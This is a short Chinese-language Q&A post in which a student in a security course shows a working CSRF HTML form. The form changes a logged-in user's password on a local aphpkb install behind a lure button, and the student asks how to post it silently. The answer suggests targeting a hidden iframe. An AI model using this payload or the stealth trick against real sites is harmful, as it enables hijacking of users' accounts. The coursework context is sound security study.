如何构造跨站请求伪造攻击？

Question

我正在上一门网络安全课，我们的任务之一是在开源项目中寻找安全漏洞。

我正在工作的这个项目似乎容易受到CSRF的影响。我构造了以下攻击，诱使用户单击包含以下内容的链接：

<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form> 

当用户当前登录到站点时，此攻击会起作用并更改站点的密码。但是，页面的结果将呈现给最终用户。我尝试了各种方法“安静地”发布表单(基于PHP的方法和基于JS的方法)，但都无济于事。

有没有人可以给我一些指导，或者给我指出正确的方向，让我知道是否可以默默地发布到另一个网站上？

Answer 1

将窗体的target设置为隐藏的<iframe>。